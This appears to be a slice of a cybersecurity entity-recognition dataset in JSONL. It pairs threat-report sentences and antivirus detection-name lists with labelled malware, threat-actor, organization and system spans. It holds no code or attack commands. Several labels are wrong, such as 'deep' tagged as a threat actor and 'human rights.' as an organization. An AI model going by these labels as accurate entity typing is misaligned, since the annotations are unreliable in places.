{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.123904.BJ Trojan-GameThief.Win32.Magania!O Backdoor.Zegost.29476 Trojan/Magania.gxtv Trojan.Zusy.Elzob.DD23 Win32.Trojan.Farfli.ai HV_MAGANIA_CA22396F.TOMC Win.Trojan.Magania-15913 Trojan.Win32.Magania.thvzy Troj.GameThief.W32.Magania.l8gE Trojan.KeyLogger.13111 Trojan.Magania.Win32.50884 BehavesLike.Win32.Dropper.ch P2P-Worm.Win32.Palevo Trojan[GameThief]/Win32.Magania Win32.Troj.Transport.b.kcloud Trojan:DOS/Killmbr.dr Trojan.Win32.A.PSW-Magania.285696.A Trojan/Win32.Magania.R41109 BScope.P2P-Worm.Palevo Trojan.Farfli!+e4pBtKCbqs", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003324", "source": "cyner2_train"}}
{"text": "Their targets have spanned all across the world, with a focus on government, defense organizations and various Eastern European governments.", "spans": {"ORGANIZATION: government, defense organizations": [[65, 98]], "ORGANIZATION: Eastern European governments.": [[111, 140]]}, "info": {"id": "cyner2_train_003325", "source": "cyner2_train"}}
{"text": "JS/Nemucod is a JavaScript downloader trojan that targets users through malware spam campaigns.", "spans": {"MALWARE: JavaScript downloader trojan": [[16, 44]]}, "info": {"id": "cyner2_train_003327", "source": "cyner2_train"}}
{"text": "This same attacker is also reported to have targeted various military installations in Central Asia in the past", "spans": {"THREAT_ACTOR: attacker": [[10, 18]], "ORGANIZATION: military installations": [[61, 83]]}, "info": {"id": "cyner2_train_003328", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.F222 Backdoor.Bedep.10384 BKDR_BEDEP.SMX Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_BEDEP.SMX Trojan.Win32.Yakes.dsmtzi Trojan.Bedep.62 BehavesLike.Win32.Spyware.cc Trojan.Win32.Crypt Backdoor/Bedep.v TR/Crypt.ZPACK.147808 Trojan[Backdoor]/Win32.Bedep Trojan.Kazy.D9859B Backdoor/Win32.Bedep.R154894 Backdoor.Bedep! W32/Bedep.D!tr Win32/Trojan.a60", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003329", "source": "cyner2_train"}}
{"text": "The Lazarus group is tied to the 2014 attack on Sony Pictures Entertainment and the 2013 DarkSeoul attacks.", "spans": {"THREAT_ACTOR: The Lazarus group": [[0, 17]], "ORGANIZATION: Sony Pictures Entertainment": [[48, 75]]}, "info": {"id": "cyner2_train_003330", "source": "cyner2_train"}}
{"text": "The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus.", "spans": {"ORGANIZATION: The Callisto Group": [[0, 18]], "THREAT_ACTOR: advanced threat actor": [[25, 46]], "ORGANIZATION: military personnel, government officials, think tanks,": [[75, 129]], "ORGANIZATION: journalists": [[134, 145]]}, "info": {"id": "cyner2_train_003333", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9901 TROJ_GRAFTOR_GG3102DA.UVPM TrojWare.Win32.TrojanDownloader.Stantinko.CB Trojan.Kbdmai.83 TROJ_GRAFTOR_GG3102DA.UVPM TR/Downloader.amdkv TrojanDownloader:Win32/Stantinko.A!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003334", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Virut.low6 Trojan.Graftor.D295ED Win32.Trojan.WisdomEyes.16070401.9500.9753 Win.Adware.Downware-564 Trojan/Win32.Unknown Trojan:Win32/Vercuser.A Worm/Win32.VB.R47661 Backdoor.Bot Trj/CI.A I-Worm.Vercuser.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003337", "source": "cyner2_train"}}
{"text": "Over the course of 2016 — and particularly intensifying towards the end of the year — several individuals known to Amnesty International were approached via email and through social media by Safeena Malik seemingly an enthusiastic activist with a strong interest in human rights.", "spans": {"ORGANIZATION: Amnesty International": [[115, 136]], "ORGANIZATION: social media": [[175, 187]], "ORGANIZATION: Safeena Malik": [[191, 204]], "ORGANIZATION: enthusiastic activist": [[218, 239]], "ORGANIZATION: human rights.": [[266, 279]]}, "info": {"id": "cyner2_train_003338", "source": "cyner2_train"}}
{"text": "As Talos is constantly monitoring changes across the threat landscape to ensure that our customers remain protected as threats continue to evolve, we took a deep dive into this malware variant to determine the technical capabilities and characteristics of Floki Bot.", "spans": {"ORGANIZATION: Talos": [[3, 8]], "ORGANIZATION: customers": [[89, 98]], "MALWARE: threats": [[119, 126]], "THREAT_ACTOR: deep": [[157, 161]], "MALWARE: malware variant": [[177, 192]], "MALWARE: Floki Bot.": [[256, 266]]}, "info": {"id": "cyner2_train_003342", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Malware.1 Win32.HEURCrypted Trojan.DownLoad.31887 TR/Spy.197632.C Heuristic.BehavesLike.Win32.Packed.C W32/Tibs.WA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003343", "source": "cyner2_train"}}
{"text": "According to the public information, cfm.com.ua domain belongs to the «Crystal Finance Millennium» software developer.", "spans": {"ORGANIZATION: the «Crystal Finance Millennium» software developer.": [[66, 118]]}, "info": {"id": "cyner2_train_003344", "source": "cyner2_train"}}
{"text": "Quick Sunday morning blog post, analysis of an unknown rtf file.", "spans": {}, "info": {"id": "cyner2_train_003346", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.JP.E5BA68 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Trojan.Win32.9728.ikjtj Trojan.DownLoader3.22821 Trojan.Win32.Swisyn TR/Dldr.Quillo.A Trojan/Win32.Unknown TrojanDownloader:Win32/Quillo.A Trojan/Win32.HDC.C3028 Trojan.DL.Quillo!tw5+WNEhU5A W32/Downloader_x.FYF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003347", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Blouiroet Trojan.Win32.Blouiroet.dx Trojan.Win32.Strictor.ewsjhc Troj.W32.Blouiroet!c Trojan.Blouiroet.Win32.43 BehavesLike.Win32.DlHelper.tc Trojan.Blouiroet.an TR/Blouiroet.shppj Trojan/Win32.Blouiroet Trojan.Zusy.D3860E Trojan.Win32.Z.Zusy.1282560 Trojan.Win32.Blouiroet.dx Trojan.Win32.Delf Trj/CI.A Win32/Trojan.c62", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003348", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Lebreat.18944 Worm.Lebreat.Win32.18 W32/Lebreat.l Trojan.Win32.Lebreat.emyp W32/Breatle.L@mm W32.Spybot.Worm Win32/Lebreat.R Worm.Lebreat.D Net-Worm.Win32.Lebreat.l W32.W.Lebreat.l!c Worm.Win32.Lebreat.R Win32.HLLW.Breat BehavesLike.Win32.Backdoor.lc W32/Breatle.VJCM-5821 I-Worm/Lebreat.a DcomRpc.G!exploit Worm[Net]/Win32.Lebreat Win32/Lebreat.worm.18944.B Worm:Win32/Reatle.L@mm Worm.Lebreat Win32.Worm-net.Lebreat.Hugg Worm.Win32.Lebreat.l", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003349", "source": "cyner2_train"}}
{"text": "They range from the recreational apps like games, skins, and themes to phone optimization boosters.", "spans": {}, "info": {"id": "cyner2_train_003350", "source": "cyner2_train"}}
{"text": "The AlienVault team has researched and added more IOC s found in the OTX portal.", "spans": {"ORGANIZATION: The AlienVault team": [[0, 19]], "SYSTEM: the OTX portal.": [[65, 80]]}, "info": {"id": "cyner2_train_003352", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.Teamspy.34816.C TrojanSpy.Skeeyah Win32.Trojan.WisdomEyes.16070401.9500.9565 Backdoor.Noknef TSPY_KONNI.A Trojan-Spy.Win32.Teamspy.jb Trojan.Win32.Teamspy.eojkym Troj.Spy.W32!c Trojan.DownLoader25.6499 TSPY_KONNI.A W32/Trojan.TMQM-1890 TrojanSpy.Teamspy.al TR/Taranis.4651 Trojan[Spy]/Win32.TeamSpy Trojan-Spy.Win32.Teamspy.jb Backdoor:Win32/Konny.A Spyware.Infostealer.86016 TrojanSpy.Teamspy Trojan.PasswordStealer Win32.Trojan-spy.Teamspy.Phgj TrojanSpy.Teamspy!7hsJ3qOc7gU Trojan.Taranis Trj/GdSda.A Win32/Trojan.6af", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003356", "source": "cyner2_train"}}
{"text": "In mid-2022, Mandiant, in collaboration with Fortinet, investigated the exploitation and deployment of malware across multiple Fortinet solutions including FortiGate firewall, FortiManager centralized management solution, and FortiAnalyzer log management, analytics, and reporting platform.", "spans": {"ORGANIZATION: Mandiant,": [[13, 22]], "ORGANIZATION: Fortinet,": [[45, 54]], "MALWARE: exploitation": [[72, 84]], "MALWARE: malware": [[103, 110]], "ORGANIZATION: Fortinet": [[127, 135]], "SYSTEM: FortiGate firewall, FortiManager centralized management solution,": [[156, 221]], "SYSTEM: FortiAnalyzer log management, analytics, and reporting platform.": [[226, 290]]}, "info": {"id": "cyner2_train_003357", "source": "cyner2_train"}}
{"text": "This malware can intercept the user's personal data, such as SMS messages, MMS messages, and USSD requests.", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: user's personal data,": [[31, 52]]}, "info": {"id": "cyner2_train_003358", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Supermm.1.0.B Backdoor/W32.SuperMM.251764 Backdoor.Win32.SuperMM.10!O BackDoor-ACL.dll Backdoor/SuperMM.10.b W32/Backdoor.MRCA-2263 Backdoor.Trojan Backdoor.Supermm.1.0.B Backdoor.Win32.SuperMM.10.b Backdoor.Supermm.1.0.B Trojan.Win32.SuperMM-10.gtre Backdoor.Win32.Z.Supermm.251764 Backdoor.W32.Supermm!c Backdoor.Supermm.1.0.B Backdoor.Win32.SuperMM.10.B Backdoor.Supermm.1.0.B BackDoor.SuperMM.10 Backdoor.SuperMM.Win32.7 BackDoor-ACL.dll Trojan/PSW.Oicqmm98.Dll Trojan[Backdoor]/Win32.SuperMM Backdoor.Supermm.1.0.B Backdoor.Win32.SuperMM.10.b Backdoor:Win32/SuperMM.B Backdoor.Supermm.1.0.B Backdoor.SuperMM Win32/SuperMM.10.B Win32.Backdoor.Supermm.Tayo Trojan.Win32.Supermm BDoor.ACL!tr.bdr Win32/Backdoor.831", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003360", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Truvasys TSPY_LIMITAIL.XXUDN Trojan.Win32.StrongPity.ekmtaw Troj.W32.Strongpity!c TSPY_LIMITAIL.XXUDN Trojan.StrongPity.j TR/StrongPity.vtcv Trojan/Win32.StrongPity Backdoor:Win32/Truvasys.A!dha PUP/Win32.DealPly.C2030575 Trojan.StrongPity! Trojan.StrongPity Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003361", "source": "cyner2_train"}}
{"text": "The adware Trojan in fact potentially allows full remote access to the infected device.", "spans": {"MALWARE: The adware Trojan": [[0, 17]], "SYSTEM: the infected device.": [[67, 87]]}, "info": {"id": "cyner2_train_003362", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Bublik!O Trojan.Bublik.Win32.6109 W32.W.AutoRun.l0qv Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.VB.xswue BehavesLike.Win32.Emotet.dh Trojan/Bublik.ccj Trojan/Win32.Bublik Trojan.Barys.D7D1 Trojan:Win32/Klovbot.B Trojan/Win32.VBNA.R146461 Trj/CI.A Trojan.Bublik!ZPZ98Vxhajk W32/VBKrypt.CFFF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003363", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Backdoor.Win32.Androm.oyzg Trojan.Win32.Androm.exrcqp Trojan.DownLoader26.14208 BehavesLike.Win32.Trojan.cc Trojan.MSIL.Crypt TR/Dropper.MSIL.ruzhp Backdoor.Win32.Androm.oyzg Trj/GdSda.A Win32.Backdoor.Androm.Ajls MSIL/Kryptik.BLU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003364", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanspy.Enkalogs TSPY_KEYLOG.AUSJOZ Win32.Trojan.WisdomEyes.16070401.9500.9994 TSPY_KEYLOG.AUSJOZ Trojan.Win32.Keylogger.evqveo Trojan.Win32.Z.Kazy.30722 W32/Application.BPVK-3177 Trojan.Kazy.D8E58F TrojanSpy:MSIL/Enkalogs.A Trj/GdSda.A MSIL/Keylogger.II!tr.spy Win32/Trojan.40d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003366", "source": "cyner2_train"}}
{"text": "CyberX has discovered a new, large-scale cyber-reconnaissance operation targeting a broad range of targets in the Ukraine.", "spans": {"ORGANIZATION: CyberX": [[0, 6]], "THREAT_ACTOR: large-scale cyber-reconnaissance operation": [[29, 71]], "ORGANIZATION: targets": [[99, 106]]}, "info": {"id": "cyner2_train_003367", "source": "cyner2_train"}}
{"text": "Since the plugin development pattern is generic and the plugin SDK can be easily embedded, the plugin architecture could be a trend among Android malware in the future.", "spans": {"SYSTEM: plugin SDK": [[56, 66]], "SYSTEM: plugin architecture": [[95, 114]], "MALWARE: Android malware": [[138, 153]]}, "info": {"id": "cyner2_train_003371", "source": "cyner2_train"}}
{"text": "A commercially available RAT.", "spans": {"MALWARE: RAT.": [[25, 29]]}, "info": {"id": "cyner2_train_003372", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.JPIS Trojan.Downloader.JPIS Trojan.Downloader.JPIS TROJ_DALBOT.SMRR Win32.Trojan.WisdomEyes.16070401.9500.9750 TROJ_DALBOT.SMRR Win.Trojan.Leepload-1 Trojan.Downloader.JPIS Trojan.Downloader.JPIS Trojan.Win32.DloadrDOI.sxvve Trojan.Win32.A.Downloader.73728.ABY Trojan.Downloader.JPIS Trojan.DownLoader6.34186 W32/Trojan.USUV-7153 Trojan/Win32.Unknown TrojanDownloader:Win32/Dalbot.A Win-Trojan/Dalbot.73728 Win32/Trojan.b77", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003373", "source": "cyner2_train"}}
{"text": "We have reported the bug to Adobe who assigned it CVE-2017-11292 and released a patch earlier today", "spans": {"ORGANIZATION: Adobe": [[28, 33]]}, "info": {"id": "cyner2_train_003374", "source": "cyner2_train"}}
{"text": "This particular application is signed with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15 : A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware .", "spans": {}, "info": {"id": "cyner2_train_003376", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Autorun.VX Trojan/W32.Cosmu.214528.B Trojan.Win32.Cosmu!O Worm.Nenebra.AP8 Win32.Worm.Delf.ca W32/Cosmu.C W32.SillyFDC Win32/Cosmu.AO Win.Trojan.Cosmu-268 Win32.Worm.Autorun.VX Trojan-Ransom.Win32.Blocker.iwkz Win32.Worm.Autorun.VX Trojan.Win32.Cosmu.vifkp Trojan.Win32.A.Cosmu.212480[UPX] Win32.Trojan.Blocker.Wnme Win32.Worm.Autorun.VX Win32.Worm.Autorun.VX Win32.HLLW.Autoruner.57682 Trojan.Cosmu.Win32.9114 W32/Cosmu.KVSE-8775 Trojan/Cosmu.gje WORM/Nenebra.A Trojan/Win32.Cosmu Win32.Worm.Autorun.VX Troj.Ransom.W32.Blocker!c Worm:Win32/Nenebra.A Win32.Worm.Autorun.VX TScope.Trojan.Delf Worm.AutoRun Trojan.Cosmu Win32/AutoRun.Delf.HF Trojan.Cosmu!gKBhUwtv5Oc Trojan-Downloader.Win32.Banload W32/Cosmu.XXS!tr W32/Autorun.JYX Win32/Worm.00b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003377", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D2ECF0 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader26.14415 BehavesLike.Win32.Trojan.cc W32/Trojan.UDBU-2080 TR/Crypt.Xpack.dmslo Backdoor/Win32.Androm.C2026756 Trj/GdSda.A Trojan.Win32.Injector Win32/Trojan.bd4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003378", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Runner.T Trojan/W32.Runner.2560.C Trojan.Win32.Runner!O Trojan.Runner.T W32/Runner.A Trojan.Runner.T Trojan.Win32.Runner.s Trojan.Runner.T Trojan.Runner.T Trojan.Win32.Runner W32/Runner.A Trojan/PSW.Almat.xs Trojan:Win32/Runner.D Troj.Dropper.W32.Small.kZ2V Trojan.Win32.Runner.s Trojan/Win32.Runner.C82211 Trojan.Runner.T HEUR/QVM39.1.CC7B.Trojan.Win32.Runner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003379", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.FC.6901 Trojan.Zusy.D1C473 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win64.Miner.re Trojan.Win32.Diztakun.dbjduc Trojan.Win32.Z.Zusy.37376.CM BehavesLike.Win32.PWSZbot.nm Trojan.Win32.Diztakun Trojan/Win64.Miner TrojanSpy:MSIL/Logstel.A Trojan.Win64.Miner.re Trj/GdSda.A Win64.Trojan.Miner.Dxwy Win32/Trojan.Spy.8ab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003380", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Hamaetot.A3 Trojan.Razy.D176F BKDR_HAMAETOT.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_HAMAETOT.SM Win.Trojan.Stainz-1 Trojan.DownLoader9.62446 BehavesLike.Win32.Trojan.mm Backdoor/MSIL.vh Trojan/Win32.MSILBot Backdoor:MSIL/Hamaetot.A Win32.Outbreak", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003381", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Small.eftzxb TrojWare.MSIL.Tiny.HA Trojan.PWS.Stealer.18264 Trojan.MSIL.Small PWS:MSIL/OnLineGames.NW!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003382", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.90AF Win32.Trojan.WisdomEyes.16070401.9500.9998 Packed.Win32.Katusha.o Trojan.Win32.Waledac Trojan.Heur.TDss.EF7F42 Packed.Win32.Katusha.o BScope.Trojan.MTA.0795", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003385", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.VBKrypt!O VBObfus.m Trojan/VBKrypt.cyuv Trojan.VBKrypt.55 Win32.Worm.Autorun.l W32.Changeup WORM_VOBFUS.SMHF Win.Trojan.Changeup-6169544-0 Worm.Win32.WBNA.ipa Trojan.Win32.WBNA.dxinid Troj.PSW32.W.VB.lPYN Win32.HLLW.Autoruner.49334 WORM_VOBFUS.SMHF BehavesLike.Win32.VBObfus.dm TR/VBKrypt.cyuv.30 Worm:Win32/Vbnoet.A Trojan.Win32.A.VBKrypt.258048 Worm.Win32.WBNA.ipa Trojan/Win32.VBKrypt.R5059 Trojan-Dropper.Krumkach.11521", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003386", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.MSIL Trojan.Win32.Z.Razy.20992.AYN Troj.Downloader.Msil!c Trojan.DownLoader25.50379 W32/Trojan.SKRD-4085 TrojanDownloader.MSIL.pxb Trojan.Razy.D361CA Backdoor:MSIL/Quasarat.A!bit Trj/GdSda.A Trojan.FOIG!tr Win32/Trojan.116", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003387", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL Ransom.FileCryptor Troj.Ransom.Msil!c Win32.Trojan.WisdomEyes.16070401.9500.9811 W32/Ransom.TAAZ-2840 Trojan.Win32.Ransom.ewmfpk Trojan.Encoder.5035 BehavesLike.Win32.Trojan.pc Trojan-Ransom.FileCoder Trojan.MSIL.hyys TR/Ransom.cgaxa Trj/GdSda.A Win32.Trojan.Raas.Auto MSIL/Filecoder.AC!tr Win32/Trojan.Ransom.568", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003388", "source": "cyner2_train"}}
{"text": "Moroever, the vawtrak sample we got downloads a new memory scraping malware that scans for credit card data in memory.", "spans": {"MALWARE: vawtrak": [[14, 21]], "MALWARE: memory scraping malware": [[52, 75]]}, "info": {"id": "cyner2_train_003389", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Cosratu TrojWare.MSIL.Cosratu.QOA Trojan.PWS.Stealer.20141 TR/Downloader.aymho PWS:MSIL/Cosratu.A!bit Trj/GdSda.A Trojan.Razy.D36F19 Trojan.MSIL.PSW Win32/Trojan.480", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003390", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojannotifier.Phinot Trojan/Phinot.120 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor.HHE Backdoor.Trojan Win32/Small.BX TROJ_PHINOT.A Trojan-Notifier.Win32.Phinot.120 Trojan.Win32.Phinot.hkgh Trojan.Popon Trojan.Phinot.Win32.1 Trojan.Win32.DNSChanger W32/Backdoor.HEXL-8738 Trojan/Delf.Phinot.a Trojan[Notifier]/Win32.Phinot Win32.Troj.Phinot.12.kcloud Trojan.Heur.GZ.E38D33 Troj.Notifier.W32.Phinot.120!c Trojan-Notifier.Win32.Phinot.120 Win32.Trojan.Phinot.Wstw Trojan.Phinot!Cq2wyKHab1w W32/Phinot.120!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003391", "source": "cyner2_train"}}
{"text": "Evidence suggests that the tool is being used as part of a very targeted campaign, focused on Chinese nationals in commercial organizations.", "spans": {"ORGANIZATION: Chinese nationals": [[94, 111]], "ORGANIZATION: commercial organizations.": [[115, 140]]}, "info": {"id": "cyner2_train_003392", "source": "cyner2_train"}}
{"text": "Reports emerged just over a week ago of a new cyber-enabled bank heist in Asia.", "spans": {}, "info": {"id": "cyner2_train_003393", "source": "cyner2_train"}}
{"text": "These attacks are highly targeted, appear to re-purpose legitimate content in decoy documents, and had very low antivirus AV detection rates at the time they were deployed.", "spans": {}, "info": {"id": "cyner2_train_003394", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Hupigon.516096.L Downloader.Small.11945 Win32.Trojan.WisdomEyes.16070401.9500.9812 Win32/Citeary.B HV_DOWN.98AC8B50 Win.Trojan.Small-20870 Trojan-Dropper.Win32.Small.hms Trojan.Win32.Small.dlprwb Trojan.DownLoader3.7934 TrojanDropper.Small.fam Trojan[Downloader]/Win32.Small Trojan-Dropper.Win32.Small.hms Win32/TrojanDownloader.Small.PJP Win32.Trojan-dropper.Small.Taow Trojan.DR.Small!DUb+rE11TVI W32/Small.HMS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003396", "source": "cyner2_train"}}
{"text": "We have named this Ransomware KeRanger. The only previous ransomware for OS X we are aware of is FileCoder, discovered by Kaspersky Lab in 2014.", "spans": {"MALWARE: Ransomware KeRanger.": [[19, 39]], "MALWARE: ransomware": [[58, 68]], "SYSTEM: OS X": [[73, 77]], "MALWARE: FileCoder,": [[97, 107]], "ORGANIZATION: Kaspersky Lab": [[122, 135]]}, "info": {"id": "cyner2_train_003397", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BhoSearcher.B Trojan.BhoSearcher.B Trojan.BhoSearcher.B Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_DURSG.A Trojan.BhoSearcher.B Trojan.BhoSearcher.B Trojan.BhoSearcher.B Trojan.BhoSearcher.10 TROJ_DURSG.A BehavesLike.Win32.Injector.nt Trojan-Downloader.Win32.ConHook Trojan:Win32/Dursg.A Trojan/Win32.ConHook.C286311 Trojan.Dursg!2KwSbji4syo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003399", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.7E63 Trojan.Win32.Patched!O Trojan.Patched.LI Win32.Trojan.WisdomEyes.16070401.9500.9933 Troj.W32.Patched.lm1y Virus.Win32.Loader.q Trojan.Patched.Win32.43121 Possible_HackToolPatched.UNP BehavesLike.Win32.NGVCK.dh Win32/PatchFile.gc TR/Patched.LI.1 HackTool:Win32/Patched.Y Win-Trojan/Patched.4095 Trojan.Win32.Patched W32/Patched.AW Win32/Trojan.bc4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003400", "source": "cyner2_train"}}
{"text": "It is under constant development, with several updated versions appearing since the original samples were observed in June 2017.", "spans": {}, "info": {"id": "cyner2_train_003402", "source": "cyner2_train"}}
{"text": "FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "VULNERABILITY: exploiting": [[38, 48]], "MALWARE: malware payloads": [[89, 105]], "MALWARE: malware families.": [[132, 149]]}, "info": {"id": "cyner2_train_003403", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom_Foreign.R002C0DKO17 W32/Trojan.ZJNJ-1589 Ransom_Foreign.R002C0DKO17 Trojan-Ransom.Win32.Foreign.nhnn Trojan.Win32.Kovter.ehmnac Trojan.ForeignCRTD.Win32.4896 W32/Trojan3.XSL Trojan.Adware.a TR/Crypt.ZPACK.gnual Trojan[Ransom]/Win32.Foreign Trojan-Ransom.Win32.Foreign.nhnn Trojan/Win32.Foreign.C1610813 BScope.Trojan-Banker.Buhtrap Trj/CI.A Trojan.Foreign Win32/TrojanDownloader.Small.ASE Win32.Trojan.Foreign.Lknk Trojan.Foreign!RxgoGgLK0WM PUA.Adstantinko W32/Small.ASE!tr Win32/Trojan.f8a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003405", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Nuker.216576 Tool.WinNuke.Win32.3 Trojan/WinNuke.a Exploit.Win32.Nuker-WinNuke.htmy W32/TrojanX.ACD Nuker.IE Exploit.Win32.Nuker.WinNuke.a Win32.Exploit.Nuker.bhro TrojWare.Win32.Nuker.WinNuke Nuke.WinNuke W32/Trojan.GJZE-2894 Nuke/WinNuke.a TR/WinNuke.A Trojan[Exploit]/Win32.Nuker Win32.Hack.WinNuke.a.kcloud Trojan:Win16/WinNuke.A Win-Trojan/Winnuke.216576 Nuker.WinNuke Win32/Nuker.WinNuke Nuker.Win32.WinNuke W32/WinNuke.A!tr Nuker.DL Win32/Trojan.750", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003406", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Small Trojan.Graftor.D1F62C BKDR_ZIYANG.A Backdoor.Trojan.B BKDR_ZIYANG.A Backdoor.Win32.Small.liq Trojan.Win32.Small.cusdaj Backdoor.W32.Small!c Trojan[Backdoor]/Win32.Small HackTool:Win32/Dlhs.B Backdoor.Win32.Small.liq Trj/Ziyang.A Backdoor.Win32.Small W32/BackDoor.A!tr Win32/Backdoor.d0c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003407", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Uztuby.5 Script.Trojan.Malautoit.E Trojan.Uztuby.5 Trojan.Uztuby.5 Trojan.Uztuby.5 W32/ObfusInjectBot.a Zum.Ciusky.3 Trojan/Win32.Zbot.C311341 Trojan.Uztuby.5 W32/MalitRar.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003408", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Small.xpm TrojanDownloader:Win32/Sagnusnagta.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003410", "source": "cyner2_train"}}
